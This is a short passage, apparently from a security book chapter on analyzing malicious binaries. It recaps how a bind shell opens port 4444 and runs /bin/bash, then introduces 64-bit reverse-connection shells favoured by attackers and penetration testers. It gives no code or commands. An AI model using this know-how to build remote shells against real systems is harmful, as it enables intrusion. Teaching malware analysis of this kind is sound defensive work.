In the previous chapter, we analyzed a potentially malicious binary that opened a socket; bound that socket to the localhost on port 4444/TCP; listened; accepted connections; redirected the socket through standard in, out, and error; and then executed /bin/bash. While that's great and that recipe was a good introduction to analyzing malicious binaries, it's time we stepped it up a notch. Most systems nowadays run on 64-bit processors and malicious users often prefer to have a victim host connect back to a listening host they control. As a penetration tester myself, I prefer reverse connections whenever possible, especially if I have the command and control infrastructure set up effectively. Don't get me wrong, ...